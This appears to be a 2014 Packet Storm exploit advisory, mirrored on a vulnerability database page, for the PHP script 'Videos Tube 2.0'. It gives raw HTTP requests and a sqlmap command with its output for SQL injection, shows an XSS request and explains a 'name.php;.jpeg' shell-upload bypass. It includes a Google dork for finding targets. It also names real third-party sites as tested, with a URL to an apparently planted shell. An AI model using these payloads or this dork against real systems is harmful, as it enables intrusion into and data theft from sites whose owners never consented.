Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKnocKoutPACKETSTORM:129128
HistoryNov 17, 2014 - 12:00 a.m.

Videos Tube 2.0 SQL Injection / XSS / Shell Upload

2014-11-1700:00:00
KnocKout
packetstormsecurity.com
18
JSON
`Videos Tube 2.0 <= (SQL/XSS/Shell Upload) Multiple Vulnerabilities  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : [email protected]  
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-Warrior.ORG -  
[+] Greetz to : http://1337day.com - http://milw00rm.com  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
KnocKout, Septemb0x , BARCOD3 , _UnDeRTaKeR_  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/ Turkey  
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/  
  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Videos Tube  
|~Price : FREE  
|~Version : 2.0, updated the lastest version.  
|~Software: http://www.phpscriptlerim.com/ucretsiz/videos-tube.html  
|~Multiple Vulnerabilities: SQL Injection & Cross Site Scripting & Shell Upload  
|~Google DORK : "© 2014, Videos Tube. Tüm Haklarý Saklýdýr."  
|[~]Date : "15 KAS. 2014"  
|[~]Tested on : Kali Linux   
  
Tested on Demos;   
  
http://demo.phpscriptlerim.com/free/videostube/  
http://www.týger61.com/  
http://www.birkovabuziddiasi.com/  
http://video.egitimledirilis.com/  
  
====================== SQL Injection Vulnerability (POST Method) ===============  
  
Example; http://demo.phpscriptlerim.com/free/videostube/  
  
Target: http://demo.phpscriptlerim.com/free/videostube/search.php  
  
POST :/ search=[SQL Injection]&ara=  
  
-------------------------------------------------------------  
POST /free/videostube/search.php HTTP/1.1  
Host: demo.phpscriptlerim.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php  
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
search=[Post Method SQL Injection]&ara=  
..  
..  
##############Exploitation sqlmap console.##########  
sqlmap -u "http://demo.phpscriptlerim.com/free/videostube/search.php" --data"=search=&ara=" -p "search" --dbs  
####################################################  
---  
Place: POST  
Parameter: search  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: search=-6400' OR (6785=6785)#&ara=  
  
Type: AND/OR time-based blind  
Title: MySQL > 5.0.11 AND time-based blind (comment)  
Payload: search=' AND SLEEP(5)#&ara=  
---  
[01:16:58] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 5.4.34  
back-end DBMS: MySQL 5.0.11  
[01:16:58] [INFO] fetching database names  
[01:16:58] [INFO] fetching number of databases  
[01:16:58] [WARNING] reflective value(s) found and filtering out  
[01:16:58] [INFO] resumed: 2  
[01:16:58] [INFO] resumed: information_schema  
[01:16:58] [INFO] resumed: phpscrip_videostube  
available databases [2]:  
[*] information_schema  
[*] phpscrip_videostube  
==============================================================================  
==============================================================================  
==================Cross Site Scripting Vulnerability =========================  
  
Target: http://demo.phpscriptlerim.com/free/videostube/search.php  
POST to :/ search=[XSS]&ara=  
-------------------------------------------------------------  
POST /free/videostube/search.php HTTP/1.1  
Host: demo.phpscriptlerim.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:33.0) Gecko/20100101 Firefox/33.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://demo.phpscriptlerim.com/free/videostube/search.php  
Cookie: __utma=219673560.691994950.1416001548.1416001548.1416001548.1; __utmb=219673560.9.10.1416001548; __utmz=219673560.1416001548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=bc6dfa419309fa2730d5b9afaed1bd98; __utmc=219673560  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 16  
search=[XSS]&ara=  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
==============================================================================  
==============================================================================  
==========Admin Panel - Shell Upload Vulnerability (bypass with Tamper data) =======  
INFO;  
  
performed primarily access the admin panel ; http://www.TARGET.com/yonetim/  
  
then go..  
http://www.VICTIM.com/upload/upload.php  
for bypass shell file name "name.php;.jpeg"   
and then using tamper data file can be loaded shell was tested!  
  
  
TESTED ON : http://www.birkovabuziddiasi.com/upload/resimler/70ed4c94a1.php  
  
=============================================================  
  
# milw00rm.com [2014-11-15]  
`
JSON